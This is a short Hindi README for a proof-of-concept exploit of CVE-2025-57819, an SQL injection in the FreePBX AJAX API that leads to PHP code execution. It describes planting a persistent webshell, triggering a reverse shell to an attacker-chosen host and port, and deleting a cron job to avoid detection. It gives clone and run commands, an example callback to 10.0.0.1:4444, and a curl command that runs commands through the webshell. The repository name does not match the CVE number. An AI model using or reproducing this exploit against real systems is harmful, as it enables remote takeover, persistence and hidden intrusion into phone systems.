
FreePBX में CVE-2025-57819 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: AJAX API में SQL इंजेक्शन के माध्यम से मनमाना PHP कोड निष्पादित करना, एक स्थायी वेबशेल बनाना, और रिवर्स शेल ट्रिगर करना।
यह स्क्रिप्ट FreePBX के 16.0.26.0 से पहले के संस्करणों (CVE-2025-57819) में एक कमजोरी का शोषण करती है, जो दूरस्थ हमलावरों को AJAX API एंडपॉइंट में SQL इंजेक्शन दोष के माध्यम से मनमाना PHP कोड निष्पादित करने की अनुमति देती है। यह एक्सप्लॉइट एक वेबशेल और एक स्वतः ट्रिगर होने वाला रिवर्स शेल दोनों बनाता है।
/admin/ajax.php)/pbxshell.php पर एक स्थायी वेबशेल बनाता हैrequests लाइब्रेरीgit clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT
-H HOST: लक्षित FreePBX इंस्टेंस (जैसे, https://freepbx.example.com)-lhost LHOST: रिवर्स शेल कॉलबैक के लिए आपका IP-lport LPORT: रिवर्स शेल कनेक्शन के लिए पोर्टpython3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444
सफल शोषण के बाद, वेबशेल तक इस प्रकार पहुँचें:
curl -X GET "http://TARGET/pbxshell.php?cmd=id"
पता लगने से बचने के लिए एक्सप्लॉइट निष्पादन के बाद क्रॉन जॉब को स्वचालित रूप से हटा देता है।
-- का उपयोग करती है/var/www/html/ निर्देशिका में लिखने की अनुमति की आवश्यकता होती है